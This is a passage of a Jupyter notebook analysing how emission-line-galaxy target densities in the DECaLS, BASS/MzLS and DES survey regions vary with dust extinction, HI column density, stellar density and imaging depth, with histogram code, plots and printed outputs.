sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('E(B-V)')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "nh1 = fits.open('NHI_HPX.fits.gz')[1].data['NHI']", "_____no_output_____" ], [ "#make data column\nthphi = radec2thphi(felg['RA'],felg['DEC'])\nr = hp.Rotator(coord=['C','G'],deg=False)\nthphiG = r(thphi[0],thphi[1])\npixhg = hp.ang2pix(1024,thphiG[0],thphiG[1])\nh1g = np.zeros(len(felg))\nfor i in range(0,len(pixhg)):\n h1g[i] = np.log(nh1[pixhg[i]])\n if i%1000000==0 : print(i)", "0\n1000000\n2000000\n3000000\n4000000\n5000000\n6000000\n7000000\n8000000\n9000000\n10000000\n11000000\n12000000\n13000000\n14000000\n15000000\n16000000\n17000000\n18000000\n19000000\n20000000\n21000000\n22000000\n23000000\n24000000\n25000000\n26000000\n27000000\n28000000\n29000000\n30000000\n31000000\n32000000\n33000000\n34000000\n35000000\n36000000\n37000000\n38000000\n39000000\n40000000\n41000000\n42000000\n43000000\n44000000\n45000000\n46000000\n47000000\n" ], [ "#make random column\nthphi = radec2thphi(relg['RA'],relg['DEC'])\nr = hp.Rotator(coord=['C','G'],deg=False)\nthphiG = r(thphi[0],thphi[1])\npixhg = hp.ang2pix(1024,thphiG[0],thphiG[1])\nh1r = np.zeros(len(relg))\nfor i in range(0,len(pixhg)):\n h1r[i] = np.log(nh1[pixhg[i]])\n if i%1000000==0 : print(i)", 
"0\n1000000\n2000000\n3000000\n4000000\n5000000\n6000000\n7000000\n8000000\n9000000\n10000000\n11000000\n12000000\n13000000\n14000000\n15000000\n16000000\n17000000\n18000000\n19000000\n20000000\n21000000\n22000000\n23000000\n24000000\n25000000\n26000000\n27000000\n28000000\n29000000\n30000000\n31000000\n32000000\n33000000\n34000000\n35000000\n36000000\n37000000\n38000000\n39000000\n40000000\n41000000\n42000000\n43000000\n44000000\n45000000\n46000000\n47000000\n48000000\n49000000\n50000000\n51000000\n52000000\n53000000\n54000000\n55000000\n56000000\n57000000\n58000000\n59000000\n60000000\n61000000\n62000000\n63000000\n64000000\n" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(h1g[dbml],weights=1./effbm*ws)\nhgn1 = np.histogram(h1g[dbml],bins=hg1[1])\nhr1 = np.histogram(h1r[rbml],bins=hg1[1])\n#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(h1g[ddnl],weights=1./effdn**2.*ws)\nhgn2 = np.histogram(h1g[ddnl],bins=hg2[1])\nhr2 = np.histogram(h1r[rdnl],bins=hg2[1])\n\n#DECaLS S\nhg3 = np.histogram(h1g[ddsl],weights=1./effds**2.)\nhgn3 = np.histogram(h1g[ddsl],bins=hg3[1])\nhr3 = np.histogram(h1r[rdsl],bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('ln(HI)')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "a = np.random.rand(len(relg))\nw = a < 0.01\nplt.plot(h1r[w],relg[w]['EBV'],'.k')\nplt.show()", "_____no_output_____" ], [ "a,b = np.histogram(h1r,weights=relg['EBV'])\nc,d = np.histogram(h1r,bins=b)\nprint(a)\nprint(c)\n", "[6.70024597e+02 2.02695586e+04 1.11988445e+05 2.41894156e+05\n 3.42473594e+05 5.88525938e+05 7.55287500e+05 4.73316500e+05\n 1.13679469e+05 3.10282480e+04]\n[ 91427 2069447 8104081 11966951 11801914 13830959 11109112 4599702\n 789186 204862]\n" ], [ "plt.plot(0.008*np.exp(np.array(xl3)-45.5),(a/c))\nplt.plot(a/c,a/c,'--')\nplt.show()", "_____no_output_____" ], [ "dhg = felg['EBV']-0.008*np.exp(h1g-45.5)", "_____no_output_____" ], [ "dhr = relg['EBV']-0.008*np.exp(h1r-45.5)", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(dhg[dbml],weights=1./effbm*ws,range=(-0.1,.15))\nhgn1 = np.histogram(dhg[dbml],bins=hg1[1])\nhr1 = np.histogram(dhr[rbml],bins=hg1[1])\n#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(dhg[ddnl],weights=1./effdn**2.*ws,range=(-0.1,.15))\nhgn2 = np.histogram(dhg[ddnl],bins=hg2[1])\nhr2 = np.histogram(dhr[rdnl],bins=hg2[1])\n\n#DECaLS S\nhg3 = np.histogram(dhg[ddsl],weights=1./effds**2.,range=(-0.1,.15))\nhgn3 = np.histogram(dhg[ddsl],bins=hg3[1])\nhr3 = np.histogram(dhr[rdsl],bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = 
[]\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('diff HI EBV')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:12: RuntimeWarning: invalid value encountered in true_divide\n if sys.path[0] == '':\n/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:13: RuntimeWarning: invalid value encountered in true_divide\n del sys.path[0]\n" ], [ "plt.scatter(relg[w]['RA'],relg[w]['DEC'],c=dhr[w],s=.1,vmax=0.04,vmin=-0.04)\nplt.colorbar()\nplt.show()", "_____no_output_____" ], [ "wr = abs(dhr) > 0.02\nwg = abs(dhg) > 0.02\nprint(len(relg[wr])/len(relg))\nprint(len(felg[wg])/len(felg))", "0.08020728215856608\n0.07749707997940432\n" ], [ "#bmzls\nw1g = ~wg & dbml\nw1r = ~wr & rbml\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[w1g]+b)\nwsn = 1./(slp*stardensg[dbml]+b)\neffbmw = effnorthl[w1g]\nhg1 = np.histogram(felg[w1g]['EBV'],weights=1./effbmw*ws,range=(0,0.15))\nhgn1 = np.histogram(felg[dbml]['EBV'],bins=hg1[1],weights=1./effbm*wsn)\nhrn1 = np.histogram(relg[rbml]['EBV'],bins=hg1[1])\nhr1 = np.histogram(relg[w1r]['EBV'],bins=hg1[1])\n#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nw1g = ~wg & ddnl\nw1r = ~wr & rdnl\nws = 1./(slp*stardensg[w1g]+b)\nwsn = 1./(slp*stardensg[ddnl]+b)\neffdnw = effsouthl[w1g]\nhg2 = np.histogram(felg[w1g]['EBV'],weights=1./effdnw**2.*ws,range=(0,0.15))\nhgn2 = np.histogram(felg[ddnl]['EBV'],bins=hg2[1],weights=1./effdn**2.*wsn)\nhrn2 = np.histogram(relg[rdnl]['EBV'],bins=hg2[1])\nhr2 = np.histogram(relg[w1r]['EBV'],bins=hg2[1])\n\n#DECaLS S\nw1g = ~wg & ddsl\nw1r = ~wr & rdsl\neffdsw = effsouthl[w1g]\nhg3 = np.histogram(felg[w1g]['EBV'],weights=1./effdsw**2.,range=(0,0.15))\nhgn3 = np.histogram(felg[ddsl]['EBV'],bins=hg3[1],weights=1./effds**2.)\nhrn3 = np.histogram(relg[rdsl]['EBV'],bins=hg3[1])\nhr3 = np.histogram(relg[w1r]['EBV'],bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nnorm1n = sum(hgn1[0])/sum(hrn1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hrn1[0]/norm1n,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nnorm2n = sum(hgn2[0])/sum(hrn2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hrn2[0]/norm2n,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nnorm3n = sum(hgn3[0])/sum(hrn3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hrn3[0]/norm3n,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('E(B-V)')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS 
N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title(r'dashed is before masking |$\\Delta$|E(B-V)$>0.02$, points are after')\nplt.show()", "_____no_output_____" ], [ "def plotvsstar(d1,r1,reg='',fmt='ko'):\n w1 = d1 \n #w1 &= felg['MORPHTYPE'] == mp\n #w1 &= d1['EBV'] < 0.15 #mask applied to (e)BOSS\n #mr = r1['EBV'] < 0.15\n hd1 = np.histogram(stardensg[w1],range=(0,5000))\n #print(hd1)\n hr1 = np.histogram(stardensr[r1],bins=hd1[1])\n #print(hr1)\n xl = []\n for i in range(0,len(hd1[0])):\n xl.append((hd1[1][i]+hd1[1][i+1])/2.)\n plt.errorbar(xl,hd1[0]/hr1[0],np.sqrt(hd1[0])/hr1[0],fmt=fmt)\n #plt.title(str(mp)+reg)\n #plt.ylabel('relative density')\n #plt.xlabel('stellar density')\n #plt.show() ", "_____no_output_____" ], [ "morphl = np.unique(felg['MORPHTYPE'])\nprint(morphl)\n\nfor mp in morphl:\n msel = felg['MORPHTYPE'] == mp\n tsel = ddsl & msel\n tseln = ddnl & msel\n print(mp)\n print(len(felg[tsel])/len(felg[ddsl]),len(felg[tseln])/len(felg[ddnl]))\n plotvsstar(tsel,rdsl,'DECaLS South')\n plotvsstar(tseln,rdnl,'DECaLS North',fmt='rd')\n # plt.title(str(mp)+reg)\n plt.ylabel('relative density')\n plt.xlabel('stellar density')\n plt.legend(['DECaLS SGC','DECaLS NGC'])\n plt.title('selecting type '+mp)\n plt.show() ", "['COMP' 'DEV' 'EXP' 'PSF' 'REX']\nCOMP\n0.0006250175739577403 0.0002525036098296342\n(array([4296, 2823, 681, 313, 113, 91, 45, 14, 4, 0]), array([ 0., 500., 1000., 1500., 2000., 2500., 3000., 3500., 4000.,\n 4500., 5000.]))\n(array([6390625, 7861978, 2379638, 1056043, 571556, 330801, 147777,\n 44012, 9620, 476]), array([ 0., 500., 1000., 1500., 2000., 2500., 3000., 3500., 4000.,\n 4500., 5000.]))\n(array([1190, 1394, 397, 204, 184, 127, 48, 15, 0, 0]), array([ 0., 500., 1000., 1500., 2000., 2500., 3000., 3500., 4000.,\n 4500., 5000.]))\n(array([6648373, 7591555, 2130256, 1188137, 830361, 417180, 148907,\n 45106, 14234, 3329]), array([ 0., 500., 1000., 1500., 2000., 2500., 3000., 3500., 4000.,\n 4500., 5000.]))\n" ], [ "'''\nDivide DECaLS S into DES and non-DES\n'''", "_____no_output_____" ], [ "import pymangle\ndesply ='/global/cscratch1/sd/raichoor/desits/des.ply'\nmng = pymangle.mangle.Mangle(desply)", "_____no_output_____" ], [ "polyidd = mng.polyid(felg['RA'],felg['DEC'])\nisdesd = polyidd != -1", "_____no_output_____" ], [ "polyidr = mng.polyid(relg['RA'],relg['DEC'])\nisdesr = polyidr != -1", "_____no_output_____" ], [ "ddsdl = ddsl & isdesd", "_____no_output_____" ], [ "ddsndl = ddsl & ~isdesd", "_____no_output_____" ], [ "rdsdl = rdsl & isdesr\nrdsndl = rdsl & ~isdesr", "_____no_output_____" ], [ "#DECaLS SGC DES\nhg1 = np.histogram(stardensg[ddsdl],weights=1./effsouthl[ddsdl]**2.,range=(0,5000))\n#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))\nhgn1 = np.histogram(stardensg[ddsl],bins=hg3[1])\nhr1 = np.histogram(stardensr[rdsdl],bins=hg1[1])\n\n#DECaLS SGC not DES\nhg2 = np.histogram(stardensg[ddsndl],weights=1./effsouthl[ddsndl]**2.,range=(0,5000))\n#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))\nhgn2 = np.histogram(stardensg[ddsndl],bins=hg3[1])\nhr2 = np.histogram(stardensr[rdsndl],bins=hg2[1])\n\nxl1 = []\nxl2 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\n#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = 
sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\n#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nplt.ylim(.7,1.3)\nplt.xlabel('Stellar Density')\nplt.ylabel('relative density')\nplt.legend((['DES','SGC, not DES']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\n#plt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:19: RuntimeWarning: invalid value encountered in true_divide\n" ], [ "'''\ng-band depth\n'''\n#DECaLS SGC DES\n\n\nhg1 = np.histogram(felg[ddsdl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,2000))\n#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))\nhgn1 = np.histogram(felg[ddsdl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsdl]['EBV']),bins=hg1[1])\nhr1 = np.histogram(relg[rdsdl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsdl]['EBV']),bins=hg1[1])\n\n#DECaLS SGC not DES\nhg2 = np.histogram(felg[ddsndl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,2000))\n#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))\nhgn2 = np.histogram(felg[ddsndl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsndl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdsndl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsndl]['EBV']),bins=hg2[1])\n\nxl1 = []\nxl2 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\n#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\n#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_G*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['DES','SGC, not DES']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\n#plt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "'''\nr-band depth\n'''\n#DECaLS SGC DES\n\n\nhg1 = np.histogram(felg[ddsdl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,2000))\n#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))\nhgn1 = np.histogram(felg[ddsdl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsdl]['EBV']),bins=hg1[1])\nhr1 = np.histogram(relg[rdsdl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsdl]['EBV']),bins=hg1[1])\n\n#DECaLS SGC not DES\nhg2 = np.histogram(felg[ddsndl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,2000))\n#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))\nhgn2 = np.histogram(felg[ddsndl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsndl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdsndl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsndl]['EBV']),bins=hg2[1])\n\nxl1 = []\nxl2 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\n#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\n#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_R*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['DES','SGC, not DES']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\n#plt.title('dashed is before MC+stellar density correction, 
points are after')\nplt.show()", "_____no_output_____" ], [ "'''\nz-band depth\n'''\n#DECaLS SGC DES\n\n\nhg1 = np.histogram(felg[ddsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,500))\n#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))\nhgn1 = np.histogram(felg[ddsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsdl]['EBV']),bins=hg1[1])\nhr1 = np.histogram(relg[rdsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsdl]['EBV']),bins=hg1[1])\n\n#DECaLS SGC not DES\nhg2 = np.histogram(felg[ddsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,500))\n#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))\nhgn2 = np.histogram(felg[ddsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsndl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsndl]['EBV']),bins=hg2[1])\n\nxl1 = []\nxl2 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\n#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\n#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_Z*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['DES','SGC, not DES']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\n#plt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:24: RuntimeWarning: invalid value encountered in true_divide\n/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:27: RuntimeWarning: invalid value encountered in true_divide\n" ], [ "'''\nAbove results didn't quite work at low depth; checking what happens when snr requirements are ignored in the MC\nResults are gone, but they basically show that removing the snr requirements makes things worse\n'''\ngrids = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffnosnrgridsouth.dat').transpose()\n#grids[3] = grids[3]\ngridn = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffnosnrgridnorth.dat').transpose()\neffsouthlno = interpeff(gsig,rsig,zsig,south=True)\neffnorthlno = interpeff(gsig,rsig,zsig,south=False)", "_____no_output_____" ], [ "effbmno = effnorthlno[dbml]\nprint(np.mean(effbmno))\neffbmno = effbmno/np.mean(effbmno)\nplt.hist(effbmno,bins=100)\nplt.show()", "_____no_output_____" ], [ "effdnno = effsouthlno[ddnl]\nprint(np.mean(effdnno))\neffdnno = effdnno/np.mean(effdnno)\nplt.hist(effdnno,bins=100)\nplt.show()\n#plt.scatter(felg[dbml]['RA'],felg[dbml]['DEC'],c=effbm)\n#plt.colorbar()\n#plt.show()\neffdsno = effsouthlno[ddsl]\nprint(np.mean(effdsno))\neffdsno = effdsno/np.mean(effdsno)\nplt.hist(effdsno,bins=100)\nplt.show()\n", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),weights=1./effbmno*ws,range=(0,200))\nhgn1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),bins=hg1[1])\nhr1 = np.histogram(relg[rbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rbml]['EBV']),bins=hg1[1])", "_____no_output_____" ], [ "#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = 
np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),weights=1./effdnno**2.*ws,range=(0,200))\nhgn2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdnl]['EBV']),bins=hg2[1])", "_____no_output_____" ], [ "#DECaLS S\nhg3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_R*felg[ddsl]['EBV']),weights=1./effdsno**2.,range=(0,200))\nhgn3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_R*felg[ddsl]['EBV']),bins=hg3[1])\nhr3 = np.histogram(relg[rdsl]['GALDEPTH_Z']*np.exp(-1.*R_R*relg[rdsl]['EBV']),bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_Z*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.show()", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),weights=1./effbmno*ws,range=(0,2000))\nhr1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])\n#no correction\nhgn1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),bins=hg1[1])\nhrn1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])", "_____no_output_____" ], [ "#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\nhg2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),weights=1./effdnno**2.*ws,range=(0,3000))\nhr2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])\n\nhgn2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),bins=hg2[1])\nhrn2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])", "_____no_output_____" ], [ "#DECaLS S\n#no strong relation with stellar density\nhg3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),weights=1./effdsno**2.,range=(0,2000))\nhr3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])\n\nhgn3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),bins=hg3[1])\nhrn3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hrn1[0]/norm1,'k:')\nnorm2 = 